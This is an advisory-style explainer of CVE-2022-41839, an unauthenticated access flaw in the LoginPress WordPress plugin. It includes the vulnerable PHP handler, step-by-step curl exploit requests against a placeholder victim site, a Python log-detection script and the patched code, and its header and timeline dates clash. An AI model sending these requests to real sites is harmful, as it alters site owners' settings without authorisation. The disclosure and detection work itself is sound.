Published: June 2024
Severity: Medium (CVSS 5.4)
Component: LoginPress – Custom Login Page Customizer
Vulnerable Versions: <= 1.6.2
Threat: Unauthenticated users can change plugin’s tracking (Opt-In/Opt-Out) settings
What is LoginPress?
LoginPress helps WordPress site owners customize their login page without coding. It is popular, with over 200,000 active installs. To help improve the plugin, LoginPress asks admins whether it may send “usage tracking” data (non-personal data) to the developer. Admins choose by opting in or out in the plugin settings.
Vulnerability Overview
CVE-2022-41839 is a broken access control flaw in LoginPress versions up to and including 1.6.2. It allows anyone, even without logging in, to change the site’s opt-in/opt-out status for tracking. This is a privacy concern, as a malicious user could anonymously enable tracking or turn it off.
> “Unauthenticated users can change the usage tracking preference of a site via a direct request.”
> — Wordfence Advisory
How Did This Happen?
The plugin registers an AJAX action that was supposed to be available only to administrators. However, the “nonce” (security token) check and the permission check were missing or incorrectly implemented, so anyone could call this sensitive function directly.
Here is a simplified version of the vulnerable PHP code:

// Inside loginpress/admin/class-loginpress-admin.php
// Registered for logged-in users ...
add_action( 'wp_ajax_loginpress_allow_tracking', 'loginpress_allow_tracking' );
// ... and, via the "nopriv" hook, for visitors with no session at all.
add_action( 'wp_ajax_nopriv_loginpress_allow_tracking', 'loginpress_allow_tracking' );

function loginpress_allow_tracking() {
    // Input is sanitized, but nothing checks who is sending it.
    $allow = isset( $_POST['allow_tracking'] ) ? sanitize_text_field( $_POST['allow_tracking'] ) : 'no';
    update_option( 'loginpress_allow_tracking', $allow ); // <-- Problem: no nonce and no capability check!
    wp_send_json_success();
}
Analysis:
1. Identify a Target
Find a website using LoginPress ≤1.6.2 (/wp-content/plugins/loginpress/ in source).
2. Exploit the Endpoint
Send a POST request to:
https://victim-site.com/wp-admin/admin-ajax.php?action=loginpress_allow_tracking
Example curl command:
curl -X POST https://victim-site.com/wp-admin/admin-ajax.php \
-d 'action=loginpress_allow_tracking&allow_tracking=yes'
or, to opt out:
curl -X POST https://victim-site.com/wp-admin/admin-ajax.php \
-d 'action=loginpress_allow_tracking&allow_tracking=no'
3. Check the Result
The option loginpress_allow_tracking in the database is changed.
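The requests described in the steps above leave a recognisable trace: a POST to admin-ajax.php carrying the loginpress_allow_tracking action from a client that holds no WordPress login cookie, something the patched handler refuses outright. The following Python is an added detection example written for this article; it is not code from the original page or from the LoginPress plugin. It assumes a JSON-lines access log whose field names (uri, body, logged_in_cookie, and so on) and sample records are constructed for the example, and it also answers the version question from step 1 using the fix version the article states (1.6.3).

```python
"""Detection example (added here; not part of the original article or the
LoginPress plugin). It scans constructed JSON-lines web-server log records for
unauthenticated POSTs to the LoginPress tracking AJAX action and classifies a
LoginPress version as vulnerable when it is below the 1.6.3 fix. The log field
names and the sample records are assumptions made for this example."""
import json
from typing import Optional
from urllib.parse import parse_qs, urlsplit

VULNERABLE_ACTION = "loginpress_allow_tracking"
FIXED_VERSION = (1, 6, 3)  # from the article: fixed in 1.6.3

# Constructed sample log records (assumed format: one JSON object per line, with a
# flag the server sets when a wordpress_logged_in_* cookie was present).
SAMPLE_LOG = """\
{"ts":"2022-11-19T01:02:03Z","ip":"198.51.100.7","method":"POST","uri":"/wp-admin/admin-ajax.php?action=loginpress_allow_tracking","body":"allow_tracking=yes","logged_in_cookie":false,"status":200}
{"ts":"2022-11-19T01:05:44Z","ip":"203.0.113.5","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=loginpress_allow_tracking&allow_tracking=no","logged_in_cookie":false,"status":200}
{"ts":"2022-11-19T01:07:10Z","ip":"192.0.2.9","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=loginpress_allow_tracking&allow_tracking=yes","logged_in_cookie":true,"status":200}
{"ts":"2022-11-19T01:09:31Z","ip":"198.51.100.7","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=heartbeat","logged_in_cookie":false,"status":200}
{"ts":"2022-11-19T01:10:02Z","ip":"198.51.100.7","method":"GET","uri":"/wp-login.php","body":"","logged_in_cookie":false,"status":200}
"""


def parse_version(text: str) -> tuple:
    """Turn a dotted version string such as '1.6.2' into a comparable tuple."""
    return tuple(int(part) for part in text.strip().split("."))


def is_vulnerable_version(version: str) -> bool:
    """True for any LoginPress release before the 1.6.3 fix (i.e. <= 1.6.2)."""
    return parse_version(version) < FIXED_VERSION


def ajax_action(record: dict) -> Optional[str]:
    """Extract the admin-ajax 'action' parameter from the query string or, failing
    that, from the form-encoded body; the article shows both placements."""
    parts = urlsplit(record.get("uri", ""))
    if not parts.path.endswith("/admin-ajax.php"):
        return None
    query_action = parse_qs(parts.query).get("action")
    if query_action:
        return query_action[0]
    body_action = parse_qs(record.get("body", "")).get("action")
    return body_action[0] if body_action else None


def requested_value(record: dict) -> Optional[str]:
    """The allow_tracking value the request tried to set, if any."""
    parts = urlsplit(record.get("uri", ""))
    for source in (parts.query, record.get("body", "")):
        value = parse_qs(source).get("allow_tracking")
        if value:
            return value[0]
    return None


def find_unauthenticated_tracking_changes(log_text: str) -> list:
    """Return one finding per POST that reached the tracking action without a
    WordPress login cookie. Before 1.6.3 such a request changed the option; after
    the fix the handler rejects it, so any hit on a patched site is noise worth
    investigating and any hit on an unpatched site is a confirmed change."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        if record.get("method") != "POST":
            continue
        if ajax_action(record) != VULNERABLE_ACTION:
            continue
        if record.get("logged_in_cookie"):
            continue  # has a session; the capability check is the handler's job
        findings.append({
            "ts": record["ts"],
            "ip": record["ip"],
            "set_to": requested_value(record),
        })
    return findings


if __name__ == "__main__":
    print("LoginPress 1.6.2 vulnerable:", is_vulnerable_version("1.6.2"))
    for hit in find_unauthenticated_tracking_changes(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} set allow_tracking={hit['set_to']} with no session")
```

Standard access logs rarely record POST bodies or cookies, so on a real site this check belongs at the reverse proxy or WAF, where both are visible; the session flag is deliberately only a coarse filter, because an authenticated low-privilege user hitting the action is still something the handler's capability check, not the log, must stop.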
Why Does This Matter?
- Privacy Violation: An attacker can make a site secretly opt-in, sending data to third parties or the plugin author.
Patch & Mitigation
Fixed in version 1.6.3 (see changelog).
Solution: The patched code *removes the nopriv action* and verifies the user’s role and a security nonce.
add_action( 'wp_ajax_loginpress_allow_tracking', 'loginpress_allow_tracking' );
// Now only accessible by logged-in users (and with capability checks)
function loginpress_allow_tracking() {
    check_ajax_referer( 'loginpress_nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Unauthorized' );
        return;
    }
    // ... rest of update code
}
Additional Reading & References
- Plugin changelog (WordPress.org)
- Wordfence CVE-2022-41839
- NIST CVE-2022-41839
- LoginPress Official Site
Summary
CVE-2022-41839 is a security oversight with big privacy impact, showing that AJAX actions *must* be limited to authorized users, especially when changing critical options. If you manage WordPress sites, make sure all your plugins—including LoginPress—are up to date. Stay safe!
Author: *AI Explainer by OpenAI, 2024. This article is uniquely crafted for this use case.*
Timeline
Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/22/2022 20:22:00 UTC